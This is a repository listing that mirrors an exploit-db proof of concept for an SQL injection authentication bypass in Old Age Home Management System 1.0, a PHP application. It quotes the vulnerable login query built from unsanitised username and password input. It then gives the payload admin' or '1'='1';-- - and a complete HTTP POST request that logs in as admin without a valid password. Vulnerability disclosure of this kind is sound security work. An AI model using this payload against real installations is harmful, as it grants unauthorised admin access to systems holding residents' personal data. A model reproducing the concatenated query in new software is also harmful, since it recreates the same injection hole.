https://github.com/twseptian/oahms1.0-sqli-authenticated-bypass

Old Age Home Management System 1.0 - SQLi Authentication Bypass
https://github.com/twseptian/oahms1.0-sqli-authenticated-bypass

Last synced: 8 months ago
JSON representation

Old Age Home Management System 1.0 - SQLi Authentication Bypass

• Host: GitHub
• URL: https://github.com/twseptian/oahms1.0-sqli-authenticated-bypass
• Owner: twseptian
• Created: 2022-06-15T06:41:26.000Z (over 3 years ago)
• Default Branch: main
• Last Pushed: 2022-06-15T06:43:28.000Z (over 3 years ago)
• Last Synced: 2024-12-26T03:43:14.867Z (10 months ago)
• Size: 2.93 KB
• Stars: 1
• Watchers: 2
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# Old Age Home Management System 1.0 - SQLi Authentication Bypass

original link: https://www.exploit-db.com/exploits/50966

```bash

# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass

# Date: 12/06/2022

# Exploit Author: twseptian

# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/

# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip

# Version: v1.0

# Tested on: Kali Linux

```

## Vulnerable code

line 9 in file `"/oahms/admin/login.php"`

```php

[SNIP]

$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");

[SNIP]

```

## Steps of reproduce:

1. Go to the admin login page http://localhost/oahms/admin/login.php

2. sqli payload:  admin' or '1'='1';-- -

3. password: password

## Proof of Concept

```bash

POST /oahms/admin/login.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 71

Origin: http://localhost

Connection: close

Referer: http://localhost/oahms/admin/login.php

Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit=

```